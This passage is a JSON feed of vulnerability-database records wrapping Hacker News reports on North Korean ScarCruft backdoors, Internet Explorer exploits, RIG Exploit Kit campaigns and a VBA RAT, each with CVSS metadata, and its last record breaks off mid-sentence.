"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-08-18T14:51:37", "id": "THN:FA6A50184463DFCD20073D5EDD0F36F2", "href": "https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-01T10:08:46", "description": "[![North Korea Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEguuDZ3qs5lgaYGEPnkSvUwvjWoNLjrTPyh6zE6rNWPcfcoi3sbiwfWOE2OLG0ZgwzBaMEgd3nhemOfZBAjXWZrvTA_2pQuFLY_ZXqKZSxQPLxDkah_q7LPIPUgatzeBpkofWujSyJFMviobYflgfFhDwuA5mkETfxo_1c2RwXl7Xqhm__-JyX2Qv5f/s728-e1000/north-korean-hackers.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEguuDZ3qs5lgaYGEPnkSvUwvjWoNLjrTPyh6zE6rNWPcfcoi3sbiwfWOE2OLG0ZgwzBaMEgd3nhemOfZBAjXWZrvTA_2pQuFLY_ZXqKZSxQPLxDkah_q7LPIPUgatzeBpkofWujSyJFMviobYflgfFhDwuA5mkETfxo_1c2RwXl7Xqhm__-JyX2Qv5f/s728-e100/north-korean-hackers.png>)\n\nThe North Korea-linked **ScarCruft** group has been attributed to a previously undocumented backdoor called **Dolphin** that the threat actor has used against targets located in its southern counterpart.\n\n\"The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers,\" ESET researcher Filip Jur\u010dacko [said](<https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/>) in a new report published today.\n\nDolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control.\n\nThe Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper.\n\nThe campaign, first uncovered by [Kaspersky](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [Volexity](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) last year, [entailed](<https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html>) the weaponization of two Internet Explorer flaws ([CVE-2020-1380](<https://nvd.nist.gov/vuln/detail/CVE-2020-1380>) and [CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>)) to drop a backdoor named BLUELIGHT.\n\nScarCruft, also called APT37, InkySquid, Reaper, and Ricochet Chollima, is a geo-political motivated APT group that has a track record of attacking government entities, diplomats, and news organizations associated with North Korean affairs. It's been known to be active since at least 2012.\n\n[![North Korea Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhItcVkM0m5zhqX10j4Fv2rPPP2We8o6mht_lw30dkUTqLNwYuZHBoHN0gjkkpvBqmX1HKaPOPG66yONSngGcbyPcS1fuUejlqggkNCggwrwmUu5IqQAAmE-8oXLWjigA1mb6AZoRm0XvLdfO8e24VTID9ZToUk_vqWUAesZVlXaXLpGkMKksGL2xEJ/s728-e1000/hacker.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhItcVkM0m5zhqX10j4Fv2rPPP2We8o6mht_lw30dkUTqLNwYuZHBoHN0gjkkpvBqmX1HKaPOPG66yONSngGcbyPcS1fuUejlqggkNCggwrwmUu5IqQAAmE-8oXLWjigA1mb6AZoRm0XvLdfO8e24VTID9ZToUk_vqWUAesZVlXaXLpGkMKksGL2xEJ/s728-e100/hacker.png>)\n\nEarlier this April, cybersecurity firm Stairwell [disclosed](<https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html>) details of a spear-phishing attack targeting journalists covering the country with the ultimate goal of deploying a malware dubbed GOLDBACKDOOR that shares tactical overlaps with BLUELIGHT.\n\nThe latest findings from ESET shed light on a second, more sophisticated backdoor delivered to a small pool of victims via BLUELIGHT, indicative of a highly-targeted espionage operation.\n\nThis, in turn, is achieved by executing an installer shellcode that activates a loader comprising a Python and shellcode component, the latter of which runs another shellcode loader to drop the backdoor.\n\n\"While the BLUELIGHT backdoor performs basic reconnaissance and evaluation of the compromised machine after exploitation, Dolphin is more sophisticated and manually deployed only against selected victims,\" Jur\u010dacko explained.\n\nWhat makes Dolphin a lot more potent than BLUELIGHT is its ability to search removable devices and connected smartphones, and exfiltrate files of interest, such as media, documents, emails, and certificates.\n\nThe backdoor, since its original discovery in April 2021, is said to have undergone three successive iterations that come with its own set of feature improvements and grant it more detection evasion capabilities.\n\n\"Dolphin is another addition to ScarCruft's extensive arsenal of backdoors abusing cloud storage services,\" Jur\u010dacko said. \"One unusual capability found in prior versions of the backdoor is the ability to modify the settings of victims' Google and Gmail accounts to lower their security, presumably in order to maintain account access for the threat actors.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-30T18:30:00", "type": "thn", "title": "North Korea Hackers Using New \"Dolphin\" Backdoor to Spy on South Korean Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2022-12-01T09:22:08", "id": "THN:27562A9FDA5CEBF33FAC792C73F4B06E", "href": "https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-09T18:09:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1nnpR24kvDx1aH-Icv1qXYk0M_wdTpu6nkdmt5aMTJe9wpMg0vvVnEw9FPAw78W2GY8s_fuJQeqv3q66nVGwOSRDPftYMKrIzIA6f1ikGEJWGGh4qlk401veeU8p9pCyp1aXhC1kpwnOj-QKJAYODctXmQw6L7FhaMTEpTXHCvgNqJrFAH-emvNhK/s728-e100/IE.png>)\n\nAn Internet Explorer zero-day vulnerability was actively exploited by a North Korean threat actor to target South Korean users by capitalizing on the recent [Itaewon Halloween crowd crush](<https://en.wikipedia.org/wiki/Seoul_Halloween_crowd_crush>) to trick users into downloading malware.\n\nThe discovery, reported by Google Threat Analysis Group researchers Beno\u00eet Sevens and Cl\u00e9ment Lecigne, is the latest set of attacks perpetrated by **ScarCruft**, which is also called APT37, InkySquid, Reaper, and Ricochet Chollima.\n\n\"The group has historically focused their targeting on South Korean users, North Korean defectors, policy makers, journalists, and human rights activists,\" TAG [said](<https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/>) in a Thursday analysis.\n\nThe new findings illustrate the threat actor's continued abuse of Internet Explorer flaws such as CVE-2020-1380 and CVE-2021-26411 to drop backdoors like [BLUELIGHT and Dolphin](<https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html>), the latter of which was disclosed by Slovak cybersecurity firm ESET late last month.\n\nAnother key tool in its arsenal is [RokRat](<https://thehackernews.com/2021/01/alert-north-korean-hackers-targeting.html>), a Windows-based remote access trojan that comes with a wide range of functions that allow it to capture screenshots, log keystrokes, and even harvest Bluetooth device information.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgEUE0iMMY7AkFgxLDL3f3WZY8lHS8vjMnIdXxVIKgFOvtuxq6gT2AkGbu49pEcdsV9-fNSjd4Hdji-98P8QRijj0QV2EJOjYOCG5qF4OUPl6UqFblFLZix3h_kvynUedhPBbjT_JX1UCAwdNeHr0SCvaG7roz2PzN-annb8Y2_VV0y7reuoQtmel06/s728-e100/IE.png>)\n\nThe attack chain observed by Google TAG entails the use of a malicious Microsoft Word document that was [uploaded to VirusTotal](<https://www.virustotal.com/gui/file/926a947ea2b59d3e9a5a6875b4de2bd071b15260370f4da5e2a60ece3517a32f/>) on October 31, 2022. It abuses yet another Internet Explorer zero-day flaw in the JScript9 JavaScript engine, CVE-2022-41128, that was [patched by Microsoft](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) last month.\n\nThe file references the October 29 incident that took place in the Itaewon neighborhood of Seoul and exploits public interest in the tragedy to retrieve an exploit for the vulnerability upon opening it. The attack is enabled by the fact that Office renders HTML content using Internet Explorer.\n\nAs the [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1600759995020124160>) points out, the same Word file was previously shared by the Shadow Chaser Group on October 31, 2022, [describing](<https://twitter.com/ShadowChasing1/status/1587035660992454656>) it as an \"interesting DOCX injection template sample\" that originated from Korea.\n\nSuccessful exploitation is followed by the delivery of a shellcode that wipes all traces by clearing the Internet Explorer cache and history as well as downloading the next stage payload.\n\nGoogle TAG said it could not recover the follow-on malware used in the campaign, although it's suspected to have involved the deployment of RokRat, BLUELIGHT, or Dolphin.\n\n\"It is not surprising that they continue to target South Korean users,\" ESET malware analyst Filip Jur\u010dacko told The Hacker News. \"We haven't seen ScarCruft use zero-day exploits for some time. Previously, they were repurposing public PoCs of n-day exploits.\"\n\n\"Given the rarity/scarcity of zero-day exploits, we expect ScarCruft would use it in combination with some of their more sophisticated backdoors such as Dolphin. Moreover, the office theme of [command-and-control] domains matches previous campaigns.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-08T07:59:00", "type": "thn", "title": "Google Warns of Internet Explorer Zero-Day Vulnerability Exploited by ScarCruft Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411", "CVE-2022-41128"], "modified": "2022-12-09T17:03:29", "id": "THN:0EBBF876A406C3077C85D0DC9EF01199", "href": "https://thehackernews.com/2022/12/google-warns-of-internet-explorer-zero.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[![RIG Exploit Kit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e1000/Malware-botnet.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e100/Malware-botnet.jpg>)\n\nA new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.\n\n\"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server,\" Bitdefender [said](<https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/>) in a new report shared with The Hacker News.\n\nMost of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.\n\nExploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.\n\nThe primary infection method used by attackers to distribute exploit kits, in this case the [Rig Exploit Kit](<https://blog.talosintelligence.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>), is through compromised websites that, when visited, drops the exploit code to ultimately send the RedLine Stealer payload to carry out follow-on attacks.\n\n[![RIG Exploit Kit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTiqBiBM_tUQDifo7wSzoSmySElE7plr5n8i313DuMqdGIvgxgtI8BwkXKvGn9BhTFJbL5wO3nEo5epjh_wK6NXHiY5HX4H-zBXR1biJrlrDoHMp0kOD9TpOFTAquH1yuDwBTqaA8sHb5ykwjftMSl6orvCwshZvLvvUeR9n89rn2ExztZfMlrZ9Zz/s728-e1000/malware-redline.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTiqBiBM_tUQDifo7wSzoSmySElE7plr5n8i313DuMqdGIvgxgtI8BwkXKvGn9BhTFJbL5wO3nEo5epjh_wK6NXHiY5HX4H-zBXR1biJrlrDoHMp0kOD9TpOFTAquH1yuDwBTqaA8sHb5ykwjftMSl6orvCwshZvLvvUeR9n89rn2ExztZfMlrZ9Zz/s728-e100/malware-redline.jpg>)\n\nThe flaw in question is [CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been [previously](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) [weaponized](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) by North Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.\n\n\"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection,\" the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.\n\nRedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.\n\nThis is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP [detailed](<https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/>) a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-28T08:20:00", "type": "thn", "title": "New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2022-04-28T08:20:39", "id": "THN:4225CEE6D7775276254C20B6E19126AE", "href": "https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![](https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg)](<https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg>)\n\nAn unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an \"unusual\" campaign.\n\nThe backdoor is distributed via a decoy document named \"Manifest.docx\" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. \n\nThe malware-laced document claims to be a \"Manifesto of the inhabitants of Crimea\" calling on the citizens to oppose Russian President Vladimir Putin and \"create a unified platform called 'People's Resistance.'\"\n\nThe Internet Explorer flaw, tracked as **CVE-2021-26411**, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to [target security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development.\n\nEarlier this February, South Korean cybersecurity firm ENKI [revealed](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft [addressed the issue](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) as part of its Patch Tuesday updates for March.\n\n[![](https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg)](<https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg>)\n\nThe Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.\n\n\"While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,\" Malwarebytes researcher Hossein Jazi said in a [report](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) shared with The Hacker News. \"The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.\"\n\nBesides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.\n\nAlso discovered by Malwarebytes is a PHP-based panel nicknamed \"Ekipa\" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.\n\n\"As the [conflict between Russia and Ukraine](<https://en.wikipedia.org/wiki/Russo-Ukrainian_War>) over Crimea continues, cyber attacks have been increasing as well,\" Jazi said. \"The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T15:18:00", "type": "thn", "title": "Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:18:26", "id": "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "href": "https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-22T05:57:19", "description": "[![RIG Exploit Kit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2wZ2WigbmeeiVSmTQ4-67rEYUW7v2I3ZX859kqxEIsqx_2RJvNHrPTNneci3kd3F74Xm1l3X8wl9ksep25v3sDCVMUE1-yMNEWMgUJEqIox4oxaikOSq0B0VsoRBGOKG5ulhQWnk5i6xfltyN5mGJdW3t0z1vXjd6kaxCI5E6GFZ4ZU4L5YI1QY6S/s728-e1000/malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2wZ2WigbmeeiVSmTQ4-67rEYUW7v2I3ZX859kqxEIsqx_2RJvNHrPTNneci3kd3F74Xm1l3X8wl9ksep25v3sDCVMUE1-yMNEWMgUJEqIox4oxaikOSq0B0VsoRBGOKG5ulhQWnk5i6xfltyN5mGJdW3t0z1vXjd6kaxCI5E6GFZ4ZU4L5YI1QY6S/s728-e100/malware.jpg>)\n\nThe operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022.\n\nThe switch in modus operandi, [spotted](<https://www.bitdefender.com/blog/labs/rig-exploit-kit-swaps-dead-raccoon-with-dridex/>) by Romanian company Bitdefender, comes in the wake of Raccoon Stealer [temporarily closing the project](<https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html>) after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.\n\nThe Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month.\n\nThat said, the Raccoon Stealer actors are already working on a second version that's expected to be \"rewritten from scratch and optimized.\" But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.\n\n[Dridex](<https://www.cisa.gov/uscert/ncas/alerts/aa19-339a>) (aka Bugat and Cridex), for its part, has the capability to download additional payloads, infiltrate browsers to steal customer login information entered on banking websites, capture screenshots, and log keystrokes, among others, through different modules that allow its functionality to be extended at will.\n\n[![RIG Exploit Kit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgBpTikSneV7T3pFFHkZC1iuLdpeuTlKFreYCRkDWPEJCcFNrVu_Aggg1pmArUunZao5RrT-2KwOLvxqcLBsymx3usE7pg7w7r3-aMy8PMbHKVLzrIsvKtKxSBr-L7BqKKlHxkCNn5_uTy5U6_dQHHR62Yoltgm_TiuZc8f7rkgEDfDB3-tzcmG-onm/s728-e1000/map.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgBpTikSneV7T3pFFHkZC1iuLdpeuTlKFreYCRkDWPEJCcFNrVu_Aggg1pmArUunZao5RrT-2KwOLvxqcLBsymx3usE7pg7w7r3-aMy8PMbHKVLzrIsvKtKxSBr-L7BqKKlHxkCNn5_uTy5U6_dQHHR62Yoltgm_TiuZc8f7rkgEDfDB3-tzcmG-onm/s728-e100/map.jpg>)\n\nIn April 2022, Bitdefender [discovered](<https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html>) another Rig Exploit Kit campaign distributing the RedLine Stealer trojan by exploiting an Internet Explorer flaw patched by Microsoft last year ([CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>)).\n\nThat's not all. Last May, a separate campaign [exploited](<https://www.bitdefender.com/blog/labs/new-wastedloader-campaign-delivered-through-rig-exploit-kit/>) two scripting engine vulnerabilities in unpatched Internet Explorer browsers ([CVE-2019-0752](<https://nvd.nist.gov/vuln/detail/CVE-2019-0752>) and [CVE-2018-8174](<https://nvd.nist.gov/vuln/detail/CVE-2018-8174>)) to deliver a malware called WastedLoader, so named for its similarities to WasterLocker but lacking the ransomware component.\n\n\"This once again demonstrates that threat actors are agile and quick to adapt to change,\" the cybersecurity firm said. \"By design, Rig Exploit Kit allows for rapid substitution of payloads in case of detection or compromise, which helps cyber criminal groups recover from disruption or environmental changes.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T05:41:00", "type": "thn", "title": "RIG Exploit Kit Now Infects Victims' PCs With Dridex Instead of Raccoon Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2019-0752", "CVE-2021-26411"], "modified": "2022-06-22T05:41:58", "id": "THN:DE791A2DD37FD88B59147561CF1F7BBF", "href": "https://thehackernews.com/2022/06/rig-exploit-kit-now-infects-victims-pcs.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:11", "description": "[![](https://thehackernews.com/images/-otB8fG2s_m4/XzPfTi8GjVI/AAAAAAAA3L0/OOJmkOvjqX46cHdcMhCRa1f-z0U2Gu2dwCLcBGAsYHQ/s728-e100/windows-hacking.png)](<https://thehackernews.com/images/-otB8fG2s_m4/XzPfTi8GjVI/AAAAAAAA3L0/OOJmkOvjqX46cHdcMhCRa1f-z0U2Gu2dwCLcBGAsYHQ/s728-e100/windows-hacking.png>)\n\nMicrosoft earlier today released its August 2020 batch of software security updates for all supported versions of its Windows operating systems and other products. \n \nThis month's Patch Tuesday updates address a total of 120 newly discovered software vulnerabilities, of which 17 are critical, and the rest are important in severity. \n \nIn a nutshell, your Windows computer can be hacked if you: \n \n\n\n * Play a video file \u2014 thanks to flaws in [Microsoft Media Foundation](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1525>) and [Windows 